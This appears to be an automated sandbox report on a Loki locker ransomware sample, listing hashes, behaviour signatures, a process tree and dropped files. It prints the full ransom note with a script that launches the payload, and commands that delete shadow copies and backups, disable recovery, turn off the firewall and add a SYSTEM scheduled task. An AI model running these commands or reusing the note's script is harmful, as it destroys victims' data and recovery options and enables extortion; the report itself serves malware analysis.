Resubmissions

21-08-2024 19:30

240821-x76q3sweqg 10

21-08-2024 17:42

240821-v92h2avgpj 10

12-06-2024 16:01

240612-tgps4a1bqh 10

Analysis

  • max time kernel
    1799s
  • max time network
    1564s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    21-08-2024 17:42

General

  • Target

    Mydoom Ransomwares/84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859.exe

  • Size

    492KB

  • MD5

    63acb0fc42adddeefed36db5b1ad61bb

  • SHA1

    7ffe0a6043397f55fd794971cac56a79fc564c0a

  • SHA256

    84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859

  • SHA512

    91787551107a0c013b3c5c35b9cb51f5880403a9f8dc3370f3392aba8b37fe210eda82a8bbd474f1d6ad73e969a8d6c2962278a9f0d595c8842269c27142c4c0

  • SSDEEP

    12288:rDA4+Z/YWwIQx+E6uI4+Z/YWvt8OW/9mZ4+QwQaNdmrlTT6zncVUJ7vn:wo9UPgTT6DN

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\info.hta

Ransom Note
<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,8,20,18,30,17).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">40767453</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>
Emails

class="m">[email protected]</span>

class="m">[email protected]</span>

URLs

http-equiv="x-ua-compatible"

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 38 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry class 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859.exe
    "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2676
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1788
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2fvalko0\2fvalko0.cmdline"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1748
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D63.tmp" "c:\ProgramData\CSC3BA725387F04414AAEF688FBB1183EA.TMP"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2416
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:688
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • System Location Discovery: System Language Discovery
        • Interacts with shadow copies
        PID:1556
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1968
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2068
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1996
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1544
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2592
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2688
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\info.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      PID:2992
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\info.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      PID:2428
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\info.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      PID:2940
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\info.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      PID:2656
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\info.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      PID:2632
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2732

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\phxpngdn.exe

    Filesize

    32KB

    MD5

    840a3fdfc972a76cabe0b5d8a983eb93

    SHA1

    f2c45c99587d43b79250f3e4ee1ef63e918a7fc9

    SHA256

    e92facc2a48712efaf1d8a36d3de7cd068323b3e7ecdda546b76aaaf7d7d375e

    SHA512

    7469c87bb27d4562c221ceaa2c87c0eeaaa528e6c831cdaecb06976d55928e8b156a22dca5afbdc321e9ee60e2e046b762a4bfae1d2d68e10d042052473248e0

  • C:\ProgramData\winlogon.exe

    Filesize

    492KB

    MD5

    63acb0fc42adddeefed36db5b1ad61bb

    SHA1

    7ffe0a6043397f55fd794971cac56a79fc564c0a

    SHA256

    84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859

    SHA512

    91787551107a0c013b3c5c35b9cb51f5880403a9f8dc3370f3392aba8b37fe210eda82a8bbd474f1d6ad73e969a8d6c2962278a9f0d595c8842269c27142c4c0

  • C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\info.hta

    Filesize

    3KB

    MD5

    4a3129c2c49c298978e56c61e7d35dc5

    SHA1

    86d50b48926de17a6fd9039f22f3869637c27b20

    SHA256

    61fd50465597c641163f0b325c350356e1b112dc59261dbc0637bb6948047573

    SHA512

    e83fbed07c42e7537ca49782f523d5eba5575bec0641f45ae7e3dac7d0924ba8b54bf593432dd12fe410ac6aa4a9a67644f686674d19cd95498afccbc7ac0819

  • C:\Users\Admin\AppData\Local\Temp\RES6D63.tmp

    Filesize

    29KB

    MD5

    a1e5e159842ac8e25ec278094672ae2e

    SHA1

    17c524553af06d73bf1cb757da8516a2fd0a4b70

    SHA256

    16996c16d11facfab7d4298c2b347ece4568d4bcb9014c61cdda5323c4e0c1d1

    SHA512

    0da4d112d09d1382b543919abc5e95899975a8fa7578e4f4afa020322457b5185688daf3189acd8ba4924bd41b76ff80afd0bbcba0b7eba3a2efce08a13a0cb6

  • C:\Users\Admin\Desktop\Cpriv.Loki

    Filesize

    2KB

    MD5

    2943b96dcb3c91fbb661ff7b8dc77abb

    SHA1

    a2694ccefbf3c3481ecd01512fd1fd7911d9299a

    SHA256

    e521c3e729b7311dbee38ab88bf4fc41e5440b48a388f8ae1cea2c62dbca8cfa

    SHA512

    1254ea59a58a4342fe2ac44156ce8aceb65239f1f66bad9393abf94de53fd5103c58187957298459f3c369324489e9ebd52e534f68612905c2c9809386f1d91d

  • C:\Users\Admin\Downloads\Restore-My-Files.txt

    Filesize

    340B

    MD5

    007cce41f413a51cee63a847ade1a4cb

    SHA1

    8bba5822b7c528dcf6e8a550cae2ce6df804c69f

    SHA256

    27c9c74275f2e4bfcaa8d62ad02f8db9486de0b342b6447491cc70034b4216b9

    SHA512

    1ef2b0ee767270ffce7809ff9e395ad11687873d49e0027e3752ce211fc63499ce8b9cb31da5490d10204eee2dd2ded2a2f353ddeb95c16fc33ba38d4276a907

  • \??\c:\ProgramData\CSC3BA725387F04414AAEF688FBB1183EA.TMP

    Filesize

    28KB

    MD5

    b2df1ba48e8bfde472735c2d4ef7a920

    SHA1

    dffb7ffa8c07240e87972b6ff0829328a839dc0f

    SHA256

    df8453a2a1d9ac66c3ce7e4fa7e14faec86148de60a92aa45f6c8146553b86d6

    SHA512

    c0c9051f2752037e2886b1a4b935ef87ddbc85e069cfc4a4d3ffe8e672a1cfdcd26343bbf734d07bca411be7b942853621320edd9e5f7a6e780159ede5a0def7

  • \??\c:\Users\Admin\AppData\Local\Temp\2fvalko0\2fvalko0.0.cs

    Filesize

    1KB

    MD5

    8d558d61d2df8851520647c008eee591

    SHA1

    c51187843fa2194fa85206a072a9ed2066ce544b

    SHA256

    56ddcd8c260d6c16fd3ea69b7b9ce98fe622bc430323e38b72faf5c9ac3cbf95

    SHA512

    7c802755bc7bfc45b43a9bcfc5fb0b5a3fb5c8e04f1ea5d6c21db1b6d36c1a39eb67c9f51761d23f55292671673054731c58b79895834d29ab41f3ca07320111

  • \??\c:\Users\Admin\AppData\Local\Temp\2fvalko0\2fvalko0.cmdline

    Filesize

    236B

    MD5

    4846d713b9ca3d2bfff54d75183063b2

    SHA1

    d97ebb68216f05c56e2970807926d26b1da1d0ef

    SHA256

    3d575297c21a8c31a9f2badbfc3a555b4179f12ba84ba95d9f2bbd68f3fb021f

    SHA512

    3fb6e150d67fe7cfceaa8b71aeabd24ee468431d9ea5a03b09b4032647340bbdd262fe80e0b7951d8890af2ca7c26b596159f3a4718e6df0f7a81def05004c22

  • \??\c:\Users\Admin\AppData\Local\Temp\nu02421o.ico

    Filesize

    27KB

    MD5

    dbc49b5f7714255217080c2e81f05a99

    SHA1

    4de2ef415d66d2bb8b389ba140a468b125388e19

    SHA256

    6d2f1f6164cbd331b9dc43b37948372e21b2ee45407aa99e199693835cded09c

    SHA512

    29a65eb7403bfc220fd057c2e6ea11b29bff545dfce2d3370ad462c66b03ae7f648efd480305423a49440de199a2a94c41214877b226a42dc2d1650683d149bb

  • memory/2676-0-0x00000000746CE000-0x00000000746CF000-memory.dmp

    Filesize

    4KB

  • memory/2676-2-0x00000000746C0000-0x0000000074DAE000-memory.dmp

    Filesize

    6.9MB

  • memory/2676-38-0x00000000746CE000-0x00000000746CF000-memory.dmp

    Filesize

    4KB

  • memory/2676-39-0x00000000746C0000-0x0000000074DAE000-memory.dmp

    Filesize

    6.9MB

  • memory/2676-1-0x0000000000D70000-0x0000000000DF4000-memory.dmp

    Filesize

    528KB